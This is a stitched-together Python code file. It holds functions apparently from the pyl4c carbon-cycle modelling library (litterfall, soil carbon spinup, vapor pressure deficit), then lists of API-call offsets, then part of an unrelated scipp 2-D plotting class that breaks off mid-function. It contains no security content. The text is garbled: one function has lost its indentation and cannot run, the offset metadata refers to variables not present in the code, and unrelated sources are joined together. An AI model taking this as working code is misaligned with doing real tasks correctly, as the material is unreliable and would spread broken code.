    ft : numpy.ndarray
        (T x N) binary freeze-thaw status (Frozen = 0, Thawed = 1)

    Returns
    -------
    numpy.ndarray
    '''
    # Build one ramp (constraint) function per environmental driver;
    # each returns values on [0, 1]
    ramp_tmin = linear_constraint(params['tmin0'], params['tmin1'])
    ramp_vpd = linear_constraint(params['vpd0'], params['vpd1'], 'reversed')
    ramp_smrz = linear_constraint(params['smrz0'], params['smrz1'])
    ramp_ft = linear_constraint(params['ft0'], 1.0, 'binary')
    # The overall multiplier is the product of the four constraints
    result = ramp_tmin(tmin)
    result = result * ramp_vpd(vpd)
    result = result * ramp_smrz(smrz)
    return result * ramp_ft(ft)
def k_mult(params, tsoil, smsf):
    '''
    Environmental-constraint multiplier on soil heterotrophic respiration
    (RH), K_mult. Soil temperature enters through an Arrhenius response
    parameterized by "tsoil"; surface soil moisture enters through a ramp
    function bounded by "smsf0" and "smsf1".

    Parameters
    ----------
    params : dict
        A dict-like data structure with named model parameters
    tsoil : numpy.ndarray
        (T x N) soil temperature (deg K); T time steps, N sites
    smsf : numpy.ndarray
        (T x N) surface soil wetness (%); T time steps, N sites

    Returns
    -------
    numpy.ndarray
    '''
    # Arrhenius temperature response with the fitted beta0, applied
    # directly; then the moisture ramp
    temperature_response = partial(arrhenius, beta0 = params['tsoil'])(tsoil)
    moisture_response = linear_constraint(
        params['smsf0'], params['smsf1'])(smsf)
    return temperature_response * moisture_response
def litterfall_casa(lai, years, dt = 1/365):
    '''
    Daily litterfall fraction after the CASA model (Randerson et al. 1996,
    *Global Biogeochemical Cycles* 10(4), 585-602). The canopy is treated
    as a mix of evergreen and deciduous components: the evergreen share
    drops a constant fraction (`dt`) of the annual total every day, while
    the deciduous share drops in proportion to daily "leaf loss," derived
    from the leaf area index (LAI) series. The evergreen fraction is
    re-computed for every calendar year (ratio of annual minimum to annual
    mean LAI), which also captures year-to-year changes in canopy
    composition. Multiplying the returned fractions by the annual NPP sum
    (per site and year) yields daily litterfall.

    Parameters
    ----------
    lai : numpy.ndarray
        The (T x N) leaf-area index (LAI) array, for T time steps, N sites
    years : numpy.ndarray
        Length-T 1D array of year labels, e.g., [2001, 2001, ...]; used to
        group time steps so fractions sum to one within each year
    dt : float
        Fraction of a year represented by one time step (Default: 1/365)

    Returns
    -------
    numpy.ndarray
        Fraction of the annual input (e.g., annual NPP) allocated to
        litterfall at each time step
    '''
    def _leaf_loss(series):
        # Triangular moving difference over a 5-point window centered on
        # the current date: the leading (left) limb minus the lagged
        # (right) limb approximates leaf loss; negative values are
        # clamped to zero because loss cannot be negative
        out = generic_filter(
            series, lambda x: (0.5 * x[0] + x[1]) - (x[3] + 0.5 * x[4]),
            size = 5, mode = 'mirror')
        return np.where(out < 0, 0, out)
    # Per-site (column-wise) leaf loss; NaN is treated as zero loss
    loss = np.apply_along_axis(_leaf_loss, 0, lai)
    loss = np.where(np.isnan(loss), 0, loss)
    for each_year in sorted(np.unique(years).tolist()):
        selector = years == each_year
        # Evergreen fraction: annual minimum LAI over annual mean LAI
        efrac = np.apply_along_axis(
            lambda x: np.nanmin(x) / np.nanmean(x), 0, lai[selector,:])
        # Evergreen canopy sheds a constant daily fraction of the annual
        # input; deciduous sheds in proportion to normalized leaf loss
        loss[selector,:] = (efrac * dt) + (1 - efrac) * np.divide(
            loss[selector,:], loss[selector,:].sum(axis = 0))
    return loss
def mean_residence_time(
        hdf, units = 'years', subset_id = None, nodata = -9999):
    '''
    Calculates the mean residence time (MRT) of soil organic carbon (SOC)
    pools as the quotient of SOC stock size and heterotrophic respiration
    (RH). Chen et al. (2013, Global and Planetary Change), provide a formal
    equation for mean residence time: (SOC/R_H).

    Parameters
    ----------
    hdf : h5py.File
        The HDF5 file / h5py.File object
    units : str
        Either "years" (default) or "days"
    subset_id : str
        (Optional) Can provide keyword designating the desired subset area
    nodata : float
        (Optional) The NoData or Fill value (Default: -9999)

    Returns
    -------
    tuple
        Tuple of: subset array, xoff, yoff, i.e., (numpy.ndarray, Int, Int)
    '''
    assert units in ('days', 'years'), 'The units argument must be one of: "days" or "years"'
    # BUG FIX: these were formerly assigned to unused names (soc_field,
    # rh_field) while the code below read the undefined soc_path/rh_path,
    # raising NameError on every call; the names now agree
    soc_path = HDF_PATHS['SPL4CMDL']['4']['SOC']
    rh_path = HDF_PATHS['SPL4CMDL']['4']['RH']
    if subset_id is not None:
        # Get X- and Y-offsets while we're at it
        soc, xoff, yoff = subset(
            hdf, soc_path, None, None, subset_id = subset_id)
        rh, _, _ = subset(
            hdf, rh_path, None, None, subset_id = subset_id)
    else:
        # No subsetting: read the full arrays, offsets are zero
        xoff = yoff = 0
        soc = hdf[soc_path][:]
        rh = hdf[rh_path][:]
    # Find those areas of NoData in either array, so they can be masked
    # out of the quotient afterwards
    mask = np.logical_or(soc == nodata, rh == nodata)
    mrt = np.divide(soc, rh)
    if units == 'years':
        # NOTE: No need to guard against NaNs/ NoData here because of mask
        mrt = np.divide(mrt, 365.0)
    np.place(mrt, mask, nodata) # Put NoData values back in
    return (mrt, xoff, yoff)
def npp(
        hdf, use_subgrid = False, subset_id = None, subset_bbox = None,
        nodata = -9999):
    '''
    Calculates net primary productivity (NPP) from gross primary
    productivity (GPP) and the carbon use efficiency (CUE) of each plant
    functional type (PFT): `NPP = GPP * CUE`, where `CUE = NPP/GPP`.

    Parameters
    ----------
    hdf : h5py.File
        The HDF5 file / h5py.File object
    use_subgrid : bool
        True to use the 1-km subgrid; requires iterating the PFT means
    subset_id : str
        (Optional) Can provide keyword designating the desired subset area
    subset_bbox : list or tuple
        (Optional) Can provide a bounding box defining the subset area
    nodata : float
        The NoData value to mask (Default: -9999)

    Returns
    -------
    numpy.ndarray
        NPP values on an EASE-Grid 2.0 array
    '''
    grid = 'M01' if use_subgrid else 'M09'
    # PFT-specific carbon use efficiency on the chosen grid
    cue_array = cue(get_pft_array(grid, subset_id, subset_bbox))
    if use_subgrid:
        raise NotImplementedError('No support for the 1-km subgrid')
    # Full-grid read unless some subset was requested
    if subset_id is None and subset_bbox is None:
        gpp = hdf['GPP/gpp_mean'][:]
    else:
        gpp, _, _ = subset(
            hdf, 'GPP/gpp_mean', subset_id = subset_id,
            subset_bbox = subset_bbox)
    # Mask fill values before multiplying so they propagate as NaN
    gpp[gpp == nodata] = np.nan
    return np.multiply(gpp, cue_array)
def ordinals365(dates):
    '''
    Returns a length-T sequence of ordinals on [1,365]. Can be used for
    indexing a 365-day climatology; see `climatology365()`. In leap years,
    every day-of-year ordinal from 60 (Feb 29) onward is shifted down by
    one so that, e.g., March 1 always maps to 60.

    Parameters
    ----------
    dates : list or tuple
        Sequence of datetime.datetime or datetime.date instances

    Returns
    -------
    list
    '''
    import calendar # Standard library; local so the fix is self-contained
    # BUG FIX: the leap test was previously `year % 4 == 0`, which wrongly
    # treats century years like 1900 and 2100 as leap years (they are not,
    # under the Gregorian rule); calendar.isleap() applies the full rule
    return [
        t - 1 if (calendar.isleap(year) and t >= 60) else t
        for t, year in [(int(d.strftime('%j')), d.year) for d in dates]
    ]
def rescale_smrz(smrz0, smrz_min, smrz_max = 100):
    '''
    Rescales root-zone soil-moisture (SMRZ); original SMRZ is in percent
    saturation units. NOTE: Although Jones et al. (2017) write "SMRZ_wp is
    the plant wilting point moisture level determined by ancillary soil
    texture data provided by L4SM..." in actuality it is just `smrz_min`.

    Parameters
    ----------
    smrz0 : numpy.ndarray
        (T x N) array of original SMRZ data, in percent (%) saturation units
        for N sites and T time steps
    smrz_min : numpy.ndarray or float
        Site-level long-term minimum SMRZ (percent saturation)
    smrz_max : numpy.ndarray or float
        Site-level long-term maximum SMRZ (percent saturation); can optionally
        provide a fixed upper-limit on SMRZ; useful for calculating SMRZ100.

    Returns
    -------
    numpy.ndarray
    '''
    # BUG FIX: a float smrz_min (allowed per the docstring) previously
    # raised AttributeError on `.ndim`; coerce to an array first so both
    # scalar and per-site minima are supported
    smrz_min = np.asarray(smrz_min)
    if smrz_min.ndim == 1:
        # Promote to a (1 x N) row so it broadcasts against (T x N) smrz0
        smrz_min = smrz_min[np.newaxis,:]
    assert smrz0.ndim == 2,\
        'Expected smrz0 to be a 2D array'
    # A scalar minimum broadcasts to every site; otherwise require one
    # value per site
    assert smrz_min.ndim == 0 or smrz0.shape[1] == smrz_min.shape[1],\
        'smrz_min should have one value per site'
    # Clip input SMRZ to the lower, upper bounds
    smrz0 = np.where(smrz0 < smrz_min, smrz_min, smrz0)
    smrz0 = np.where(smrz0 > smrz_max, smrz_max, smrz0)
    # Normalize to (0, 100], then add 1 so the logarithm below is defined
    smrz_norm = np.add(np.multiply(100, np.divide(
        np.subtract(smrz0, smrz_min),
        np.subtract(smrz_max, smrz_min))), 1)
    # Log-transform normalized data and rescale to range between
    # 5.0 and 100 ()% saturation)
    return np.add(
        np.multiply(95, np.divide(np.log(smrz_norm), np.log(101))), 5)
def soc_analytical_spinup(litterfall, k_mult, fmet, fstr, decay_rates):
    r'''
    Steady-state sizes of the soil organic carbon (SOC) pools, from the
    analytical solution to the governing differential equations.

    Metabolic ("fast") pool:

    $$
    C_{met} = \frac{f_{met} \sum NPP}{R_{opt} \sum K_{mult}}
    $$

    Structural ("medium") pool:

    $$
    C_{str} = \frac{(1 - f_{met})\sum NPP}{R_{opt}\, k_{str} \sum K_{mult}}
    $$

    Recalcitrant ("slow") pool:

    $$
    C_{rec} = \frac{f_{str}\, k_{str}\, C_{str}}{k_{rec}}
    $$

    Parameters
    ----------
    litterfall : numpy.ndarray
        Average daily litterfall
    k_mult : numpy.ndarray
        The K_mult climatology, i.e., a (365 x N x 81) array of the
        long-term average K_mult at each of N sites (81 1-km subgrid sites)
    fmet : numpy.ndarray
        The f_metabolic model parameter, as an (N x 81) array
    fstr : numpy.ndarray
        The f_structural model parameter, as an (N x 81) array
    decay_rates : numpy.ndarray
        The optimal decay rates for each SOC pool, as a (3 x N x 81) array

    Returns
    -------
    tuple
        `(metabolic, structural, recalcitrant)` steady-state pool sizes
    '''
    # litterfall is the *daily* average (divided by 365 upstream), so
    # multiply by 365 to recover the annual sum
    annual_npp = litterfall * 365
    kmult_total = np.sum(k_mult, axis = 0)
    metabolic = np.divide(
        fmet * annual_npp, decay_rates[0,...] * kmult_total)
    structural = np.divide(
        (1 - fmet) * annual_npp, decay_rates[1,...] * kmult_total)
    recalcitrant = np.divide(
        fstr * decay_rates[1,...] * structural, decay_rates[2,...])
    # Zero-fill NaNs (e.g., from 0/0 divisions) in every pool
    for pool in (metabolic, structural, recalcitrant):
        pool[np.isnan(pool)] = 0
    return (metabolic, structural, recalcitrant)
def tridiag_solver(tri, r, kl = 1, ku = 1, banded = None):
'''
Solution to the tridiagonal equation by solving the system of equations
in sparse form. Creates a banded matrix consisting of the diagonals,
starting with the lowest diagonal and moving up, e.g., for matrix:
A = [[10., 2., 0., 0.],
[ 3., 10., 4., 0.],
[ 0., 1., 7., 5.],
[ 0., 0., 3., 4.]]
banded = [[ 3., 1., 3., 0.],
[10., 10., 7., 4.],
[ 0., 2., 4., 5.]]
The banded matrix is what should be provided to the optoinal "banded"
argument, which should be used if the banded matrix can be created faster
than `scipy.sparse.dia_matrix()`.
Parameters
----------
tri : numpy.ndarray
A tridiagonal matrix (N x N)
r : numpy.ndarray
Vector of solutions to the system, Ax = r, where A is the tridiagonal
matrix
kl : int
Lower bandwidth (number of lower diagonals) (Default: 1)
ku : int
Upper bandwidth (number of upper diagonals) (Default: 1)
banded : numpy.ndarray
(Optional) Provide the banded matrix with diagonals along the rows;
this can be faster than scipy.sparse.dia_matrix()
Returns
-------
numpy.ndarray
'''
assert tri.ndim == 2 and (tri.shape[0] == tri.shape[1]),\
'Only supports 2-dimensional square matrices'
if banded is None:
banded = dia_matrix(tri).data
# If it is necessary, in a future implementation, to extract diagonals;
# this is a starting point for problems where kl = ku = 1
# n = tri.shape[0]
# a, b, c = [ # (n-1, n, n-1) refer to the lengths of each vector
# sparse[(i+1),(max(0,i)):j]
# for i, j in zip(range(-1, 2), (n-1, n, n+1))
# ]
return solve_banded((kl, ku), np.flipud(banded), r)
def vpd(qv2m, ps, temp_k):
    r'''
    Vapor pressure deficit (VPD), computed exactly as in the SMAP L4C
    Science code base (the formula's original provenance cannot be
    properly attributed):

    $$
    \mathrm{VPD} = 610.7 \times \mathrm{exp}\left(
        \frac{17.38 \times T_C}{239 + T_C}
    \right) - \frac{(P \times [\mathrm{QV2M}]}{0.622 + (0.378 \times [\mathrm{QV2M}])}
    $$

    Where P is the surface pressure (Pa), QV2M is the water vapor mixing
    ratio at 2-meter height, and T_C is the temperature in degrees C
    (though this function takes Kelvin). A variation on this formula
    appears in Monteith & Unsworth (1990), Principles of Environmental
    Physics, 2nd Ed. See also:
    https://glossary.ametsoc.org/wiki/Mixing_ratio

    Parameters
    ----------
    qv2m : numpy.ndarray or float
        QV2M, the water vapor mixing ratio at 2-m height
    ps : numpy.ndarray or float
        The surface pressure, in Pascals
    temp_k : numpy.ndarray or float
        The temperature at 2-m height in degrees Kelvin

    Returns
    -------
    numpy.ndarray or float
        VPD in Pascals
    '''
    celsius = temp_k - 273.15 # The formula wants degrees C
    # Actual vapor pressure, from the mixing ratio and surface pressure
    actual_vp = np.divide(np.multiply(qv2m, ps), 0.622 + (0.378 * qv2m))
    # Saturation vapor pressure (Pa), Magnus-type exponential form
    saturation_vp = 610.7 * np.exp(np.divide(17.38 * celsius, (239 + celsius)))
    return np.subtract(saturation_vp, actual_vp)
|
[
"numpy.sum",
"numpy.ones",
"numpy.isnan",
"numpy.exp",
"numpy.unique",
"numpy.nanmean",
"numpy.multiply",
"pyl4c.stats.linear_constraint",
"numpy.power",
"numpy.isfinite",
"numpy.place",
"numpy.apply_along_axis",
"pyl4c.utils.get_pft_array",
"scipy.sparse.dia_matrix",
"numpy.var",
"numpy.stack",
"functools.partial",
"numpy.divide",
"numpy.flipud",
"numpy.sort",
"scipy.ndimage.generic_filter",
"pyl4c.utils.subset",
"numpy.subtract",
"numpy.logical_and",
"numpy.log",
"numpy.zeros",
"numpy.nanmin",
"numpy.where",
"numpy.logical_or"
] |
[((4740, 4761), 'numpy.sort', 'np.sort', (['series[:, 0]'], {}), '(series[:, 0])\n', (4747, 4761), True, 'import numpy as np\n'), ((4769, 4790), 'numpy.sort', 'np.sort', (['series[:, 1]'], {}), '(series[:, 1])\n', (4776, 4790), True, 'import numpy as np\n'), ((9339, 9367), 'numpy.zeros', 'np.zeros', (['arr_24hr.shape[1:]'], {}), '(arr_24hr.shape[1:])\n', (9347, 9367), True, 'import numpy as np\n'), ((9552, 9605), 'numpy.apply_along_axis', 'np.apply_along_axis', (['(lambda x: x[1] > x[0])', '(0)', 'updown'], {}), '(lambda x: x[1] > x[0], 0, updown)\n', (9571, 9605), True, 'import numpy as np\n'), ((9651, 9709), 'numpy.logical_and', 'np.logical_and', (['(updown[0, ...] == -1)', '(updown[1, ...] == -1)'], {}), '(updown[0, ...] == -1, updown[1, ...] == -1)\n', (9665, 9709), True, 'import numpy as np\n'), ((11422, 11460), 'numpy.stack', 'np.stack', (['(arr_daytime, arr_nighttime)'], {}), '((arr_daytime, arr_nighttime))\n', (11430, 11460), True, 'import numpy as np\n'), ((12901, 12952), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['tmin0']", "params['tmin1']"], {}), "(params['tmin0'], params['tmin1'])\n", (12918, 12952), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((12966, 13027), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['vpd0']", "params['vpd1']", '"""reversed"""'], {}), "(params['vpd0'], params['vpd1'], 'reversed')\n", (12983, 13027), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((13041, 13092), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['smrz0']", "params['smrz1']"], {}), "(params['smrz0'], params['smrz1'])\n", (13058, 13092), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((13106, 13153), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['ft0']", '(1.0)', '"""binary"""'], {}), "(params['ft0'], 1.0, 'binary')\n", (13123, 13153), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), 
((14066, 14107), 'functools.partial', 'partial', (['arrhenius'], {'beta0': "params['tsoil']"}), "(arrhenius, beta0=params['tsoil'])\n", (14073, 14107), False, 'from functools import partial\n'), ((14124, 14175), 'pyl4c.stats.linear_constraint', 'linear_constraint', (["params['smsf0']", "params['smsf1']"], {}), "(params['smsf0'], params['smsf1'])\n", (14141, 14175), False, 'from pyl4c.stats import ols, ols_variance, linear_constraint\n'), ((16701, 16739), 'numpy.apply_along_axis', 'np.apply_along_axis', (['leaf_loss', '(0)', 'lai'], {}), '(leaf_loss, 0, lai)\n', (16720, 16739), True, 'import numpy as np\n'), ((18932, 18974), 'numpy.logical_or', 'np.logical_or', (['(soc == nodata)', '(rh == nodata)'], {}), '(soc == nodata, rh == nodata)\n', (18945, 18974), True, 'import numpy as np\n'), ((18985, 19003), 'numpy.divide', 'np.divide', (['soc', 'rh'], {}), '(soc, rh)\n', (18994, 19003), True, 'import numpy as np\n'), ((19144, 19171), 'numpy.place', 'np.place', (['mrt', 'mask', 'nodata'], {}), '(mrt, mask, nodata)\n', (19152, 19171), True, 'import numpy as np\n'), ((20608, 20635), 'numpy.multiply', 'np.multiply', (['gpp', 'cue_array'], {}), '(gpp, cue_array)\n', (20619, 20635), True, 'import numpy as np\n'), ((22281, 22324), 'numpy.where', 'np.where', (['(smrz0 < smrz_min)', 'smrz_min', 'smrz0'], {}), '(smrz0 < smrz_min, smrz_min, smrz0)\n', (22289, 22324), True, 'import numpy as np\n'), ((22337, 22380), 'numpy.where', 'np.where', (['(smrz0 > smrz_max)', 'smrz_max', 'smrz0'], {}), '(smrz0 > smrz_max, smrz_max, smrz0)\n', (22345, 22380), True, 'import numpy as np\n'), ((24538, 24601), 'numpy.divide', 'np.divide', (['(fstr * decay_rates[1, ...] * c1)', 'decay_rates[2, ...]'], {}), '(fstr * decay_rates[1, ...] 
* c1, decay_rates[2, ...])\n', (24547, 24601), True, 'import numpy as np\n'), ((27992, 28031), 'numpy.divide', 'np.divide', (['(17.38 * temp_c)', '(239 + temp_c)'], {}), '(17.38 * temp_c, 239 + temp_c)\n', (28001, 28031), True, 'import numpy as np\n'), ((28068, 28090), 'numpy.subtract', 'np.subtract', (['esat', 'avp'], {}), '(esat, avp)\n', (28079, 28090), True, 'import numpy as np\n'), ((1266, 1291), 'numpy.subtract', 'np.subtract', (['tsoil', 'beta2'], {}), '(tsoil, beta2)\n', (1277, 1291), True, 'import numpy as np\n'), ((1488, 1511), 'numpy.where', 'np.where', (['(y0 < 0)', '(0)', 'y0'], {}), '(y0 < 0, 0, y0)\n', (1496, 1511), True, 'import numpy as np\n'), ((10509, 10543), 'numpy.logical_or', 'np.logical_or', (['never_up', 'sun_is_up'], {}), '(never_up, sun_is_up)\n', (10522, 10543), True, 'import numpy as np\n'), ((11132, 11168), 'numpy.divide', 'np.divide', (['arr_daytime', 'daylight_hrs'], {}), '(arr_daytime, daylight_hrs)\n', (11141, 11168), True, 'import numpy as np\n'), ((11193, 11236), 'numpy.divide', 'np.divide', (['arr_nighttime', '(24 - daylight_hrs)'], {}), '(arr_nighttime, 24 - daylight_hrs)\n', (11202, 11236), True, 'import numpy as np\n'), ((16454, 16552), 'scipy.ndimage.generic_filter', 'generic_filter', (['lai', '(lambda x: 0.5 * x[0] + x[1] - (x[3] + 0.5 * x[4]))'], {'size': '(5)', 'mode': '"""mirror"""'}), "(lai, lambda x: 0.5 * x[0] + x[1] - (x[3] + 0.5 * x[4]), size\n =5, mode='mirror')\n", (16468, 16552), False, 'from scipy.ndimage import generic_filter\n'), ((16594, 16617), 'numpy.where', 'np.where', (['(ll < 0)', '(0)', 'll'], {}), '(ll < 0, 0, ll)\n', (16602, 16617), True, 'import numpy as np\n'), ((16758, 16770), 'numpy.isnan', 'np.isnan', (['ll'], {}), '(ll)\n', (16766, 16770), True, 'import numpy as np\n'), ((18619, 18673), 'pyl4c.utils.subset', 'subset', (['hdf', 'soc_path', 'None', 'None'], {'subset_id': 'subset_id'}), '(hdf, soc_path, None, None, subset_id=subset_id)\n', (18625, 18673), False, 'from pyl4c.utils import 
get_pft_array, subset\n'), ((18708, 18761), 'pyl4c.utils.subset', 'subset', (['hdf', 'rh_path', 'None', 'None'], {'subset_id': 'subset_id'}), '(hdf, rh_path, None, None, subset_id=subset_id)\n', (18714, 18761), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((19118, 19139), 'numpy.divide', 'np.divide', (['mrt', '(365.0)'], {}), '(mrt, 365.0)\n', (19127, 19139), True, 'import numpy as np\n'), ((20166, 20209), 'pyl4c.utils.get_pft_array', 'get_pft_array', (['grid', 'subset_id', 'subset_bbox'], {}), '(grid, subset_id, subset_bbox)\n', (20179, 20209), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((24624, 24636), 'numpy.isnan', 'np.isnan', (['c0'], {}), '(c0)\n', (24632, 24636), True, 'import numpy as np\n'), ((24649, 24661), 'numpy.isnan', 'np.isnan', (['c1'], {}), '(c1)\n', (24657, 24661), True, 'import numpy as np\n'), ((24674, 24686), 'numpy.isnan', 'np.isnan', (['c2'], {}), '(c2)\n', (24682, 24686), True, 'import numpy as np\n'), ((26576, 26593), 'numpy.flipud', 'np.flipud', (['banded'], {}), '(banded)\n', (26585, 26593), True, 'import numpy as np\n'), ((27940, 27961), 'numpy.multiply', 'np.multiply', (['qv2m', 'ps'], {}), '(qv2m, ps)\n', (27951, 27961), True, 'import numpy as np\n'), ((28050, 28059), 'numpy.exp', 'np.exp', (['x'], {}), '(x)\n', (28056, 28059), True, 'import numpy as np\n'), ((1387, 1404), 'numpy.subtract', 'np.subtract', (['a', 'b'], {}), '(a, b)\n', (1398, 1404), True, 'import numpy as np\n'), ((4279, 4307), 'numpy.power', 'np.power', (['x[:, 0]', '(npoly + 1)'], {}), '(x[:, 0], npoly + 1)\n', (4287, 4307), True, 'import numpy as np\n'), ((4445, 4456), 'numpy.isnan', 'np.isnan', (['y'], {}), '(y)\n', (4453, 4456), True, 'import numpy as np\n'), ((4927, 4936), 'numpy.var', 'np.var', (['y'], {}), '(y)\n', (4933, 4936), True, 'import numpy as np\n'), ((4945, 4954), 'numpy.var', 'np.var', (['x'], {}), '(x)\n', (4951, 4954), True, 'import numpy as np\n'), ((5087, 5096), 'numpy.var', 'np.var', (['y'], {}), '(y)\n', (5093, 
5096), True, 'import numpy as np\n'), ((5106, 5115), 'numpy.var', 'np.var', (['x'], {}), '(x)\n', (5112, 5115), True, 'import numpy as np\n'), ((10559, 10595), 'numpy.where', 'np.where', (['mask', 'arr_24hr[hr, ...]', '(0)'], {}), '(mask, arr_24hr[hr, ...], 0)\n', (10567, 10595), True, 'import numpy as np\n'), ((10656, 10693), 'numpy.where', 'np.where', (['(~mask)', 'arr_24hr[hr, ...]', '(0)'], {}), '(~mask, arr_24hr[hr, ...], 0)\n', (10664, 10693), True, 'import numpy as np\n'), ((10976, 10996), 'numpy.where', 'np.where', (['mask', '(1)', '(0)'], {}), '(mask, 1, 0)\n', (10984, 10996), True, 'import numpy as np\n'), ((16830, 16846), 'numpy.unique', 'np.unique', (['years'], {}), '(years)\n', (16839, 16846), True, 'import numpy as np\n'), ((20320, 20393), 'pyl4c.utils.subset', 'subset', (['hdf', '"""GPP/gpp_mean"""'], {'subset_id': 'subset_id', 'subset_bbox': 'subset_bbox'}), "(hdf, 'GPP/gpp_mean', subset_id=subset_id, subset_bbox=subset_bbox)\n", (20326, 20393), False, 'from pyl4c.utils import get_pft_array, subset\n'), ((24387, 24409), 'numpy.sum', 'np.sum', (['k_mult'], {'axis': '(0)'}), '(k_mult, axis=0)\n', (24393, 24409), True, 'import numpy as np\n'), ((24503, 24525), 'numpy.sum', 'np.sum', (['k_mult'], {'axis': '(0)'}), '(k_mult, axis=0)\n', (24509, 24525), True, 'import numpy as np\n'), ((26188, 26203), 'scipy.sparse.dia_matrix', 'dia_matrix', (['tri'], {}), '(tri)\n', (26198, 26203), False, 'from scipy.sparse import dia_matrix\n'), ((4466, 4487), 'numpy.ones', 'np.ones', (['(npoly + 1,)'], {}), '((npoly + 1,))\n', (4473, 4487), True, 'import numpy as np\n'), ((7369, 7411), 'numpy.nanmean', 'np.nanmean', (['x[ordinal == day, ...]'], {'axis': '(0)'}), '(x[ordinal == day, ...], axis=0)\n', (7379, 7411), True, 'import numpy as np\n'), ((10145, 10203), 'numpy.logical_and', 'np.logical_and', (['(updown[0, ...] <= hr)', '(hr <= updown[1, ...])'], {}), '(updown[0, ...] 
<= hr, hr <= updown[1, ...])\n', (10159, 10203), True, 'import numpy as np\n'), ((10287, 10344), 'numpy.logical_or', 'np.logical_or', (['(updown[0, ...] <= hr)', '(hr <= updown[1, ...])'], {}), '(updown[0, ...] <= hr, hr <= updown[1, ...])\n', (10300, 10344), True, 'import numpy as np\n'), ((11379, 11405), 'numpy.isfinite', 'np.isfinite', (['arr_nighttime'], {}), '(arr_nighttime)\n', (11390, 11405), True, 'import numpy as np\n'), ((22440, 22468), 'numpy.subtract', 'np.subtract', (['smrz0', 'smrz_min'], {}), '(smrz0, smrz_min)\n', (22451, 22468), True, 'import numpy as np\n'), ((22478, 22509), 'numpy.subtract', 'np.subtract', (['smrz_max', 'smrz_min'], {}), '(smrz_max, smrz_min)\n', (22489, 22509), True, 'import numpy as np\n'), ((22670, 22687), 'numpy.log', 'np.log', (['smrz_norm'], {}), '(smrz_norm)\n', (22676, 22687), True, 'import numpy as np\n'), ((22689, 22700), 'numpy.log', 'np.log', (['(101)'], {}), '(101)\n', (22695, 22700), True, 'import numpy as np\n'), ((4631, 4652), 'numpy.ones', 'np.ones', (['(npoly + 1,)'], {}), '((npoly + 1,))\n', (4638, 4652), True, 'import numpy as np\n'), ((17161, 17173), 'numpy.nanmin', 'np.nanmin', (['x'], {}), '(x)\n', (17170, 17173), True, 'import numpy as np\n'), ((17176, 17189), 'numpy.nanmean', 'np.nanmean', (['x'], {}), '(x)\n', (17186, 17189), True, 'import numpy as np\n')]
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author <NAME>
from .view import PlotView
from ..core import zeros, scalar
import numpy as np
from matplotlib.collections import PathCollection
class PlotView2d(PlotView):
    """
    View object for 2 dimensional plots. Contains a `PlotFigure2d`.
    The difference between `PlotView2d` and `PlotFigure2d` is that
    `PlotView2d` also handles the communications with the `PlotController` that
    are to do with the `PlotProfile` plot displayed below the `PlotFigure2d`.
    In addition, `PlotView2d` provides a dynamic image resampling for large
    input data.
    """
    def __init__(self, figure, formatters):
        """
        Store figure/formatters on the base class, initialize marker and
        axes-limit state, and subscribe to the matplotlib axes-limit
        change events used for dynamic resampling.
        """
        super().__init__(figure=figure, formatters=formatters)
        self._axes = ['y', 'x']
        # Data indices of picked scatter markers, in pick order
        self._marker_index = []
        # The PathCollection holding all marker points (None until first mark)
        self._marks_scatter = None
        # Lock flag: x- and y-limit changes arrive as two separate events;
        # only the second of the pair triggers a resample (see _lims_changed)
        self._lim_updated = False
        # Per-dimension [low, high] of the current viewport
        self.current_lims = {}
        # Per-dimension [low, high] of the full data extent (set once)
        self.global_lims = {}
        for event in ['xlim_changed', 'ylim_changed']:
            self.figure.ax.callbacks.connect(event, self._lims_changed)
    def _make_data(self, new_values, mask_info):
        """
        Build the dict of plot data handed to the figure: the 2-D values,
        the image extent for the current viewport, and (if any masks are
        enabled) a combined mask array. Also records the global data
        bounds on first use and resets the current viewport to them.
        """
        dims = new_values.dims
        for dim in dims:
            # First/last coordinate values give the data extent along dim
            xmin = new_values.coords[dim].values[0]
            xmax = new_values.coords[dim].values[-1]
            if dim not in self.global_lims:
                # First call for this dim: remember the full data bounds
                self.global_lims[dim] = [xmin, xmax]
            self.current_lims[dim] = [xmin, xmax]
        values = new_values.values
        slice_values = {
            "values":
            values,
            # Extent ordered [xmin, xmax, ymin, ymax]: dims[1] is x,
            # dims[0] is y (see self._axes)
            "extent":
            np.array([self.current_lims[dims[1]],
                      self.current_lims[dims[0]]]).flatten()
        }
        # NOTE(review): mask_info appears to be a dict keyed by data-array
        # name, each value a {mask_name: enabled} dict; only the first
        # entry is used -- confirm against the controller
        mask_info = next(iter(mask_info.values()))
        if len(mask_info) > 0:
            # Use automatic broadcasting in Scipp variables
            msk = zeros(sizes=new_values.sizes, dtype='int32', unit=None)
            for m, val in mask_info.items():
                if val:
                    # Accumulate every enabled mask into one int array
                    msk += new_values.masks[m].astype(msk.dtype)
            slice_values["masks"] = msk.values
        return slice_values
    def _lims_changed(self, *args):
        """
        Update limits and resample the image according to new viewport.
        When we use the zoom tool, the event listener on the displayed axes
        limits detects two separate events: one for the x axis and another for
        the y axis. We use a small locking mechanism here to trigger only a
        single resampling update by waiting for the y limits to also change.
        """
        for dim in self.dims:
            # Bail out until _make_data has recorded the data bounds
            if dim not in self.global_lims:
                return
        if not self._lim_updated:
            # First event of the x/y pair: set the flag and wait
            self._lim_updated = True
            return
        self._lim_updated = False
        # Make sure we don't overrun the original array bounds
        dimx = self.dims[1]
        dimy = self.dims[0]
        xylims = {
            dimx: np.clip(self.figure.ax.get_xlim(), *sorted(self.global_lims[dimx])),
            dimy: np.clip(self.figure.ax.get_ylim(), *sorted(self.global_lims[dimy]))
        }
        # Relative change of the viewport along each axis, normalized by
        # the current viewport span
        dx = np.abs(self.current_lims[dimx][1] - self.current_lims[dimx][0])
        dy = np.abs(self.current_lims[dimy][1] - self.current_lims[dimy][0])
        diffx = np.abs(self.current_lims[dimx] - xylims[dimx]) / dx
